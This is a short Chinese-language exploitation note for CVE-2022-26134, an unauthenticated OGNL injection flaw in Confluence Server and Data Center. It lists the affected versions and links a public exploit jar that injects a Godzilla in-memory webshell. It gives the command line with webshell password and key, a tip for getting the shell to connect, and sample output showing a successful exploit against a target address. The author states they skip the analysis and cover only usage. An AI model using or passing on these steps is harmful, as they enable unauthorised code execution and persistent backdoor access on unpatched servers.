CVE-2022-26134 Confluence OGNL RCE
CVE-2022-26134 Confluence OGNL RCE
漏洞描述
最近 Confluence 官方通报了一个严重漏洞 CVE-2022-26134,远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码。
利用范围
Confluence Server and Data Center >= 1.3.0 Confluence Server and Data Center < 7.4.17 Confluence Server and Data Center < 7.13.7 Confluence Server and Data Center < 7.14.3 Confluence Server and Data Center < 7.15.2 Confluence Server and Data Center < 7.16.4 Confluence Server and Data Center < 7.17.4 Confluence Server and Data Center < 7.18.1 漏洞分析过程做不来,直接冲怎么用。
漏洞利用
漏洞利用脚本如下:https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL CVE-2022-26134.jar
java -jar CVE-2022-26134.jar 哥斯拉密码 哥斯拉密钥
example
java -jar CVE-2022-26134.jar pass key
如果内存Shell已经注入成功但哥斯拉无法连接,请在请求配置添加以下协议头或者为哥斯拉配置Burp代理
Connection: close

C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
[*] url: http://10.10.10.10:8090/
[*] send payload
[*] exploit success
[*] godzilla webshell password : pass
[*] godzilla webshell key : key
C:\CVE_2022_26134_jar>


参考
https://www.anquanke.com/post/id/274026 CVE-2022-26134 Confluence OGNL RCE 漏洞分析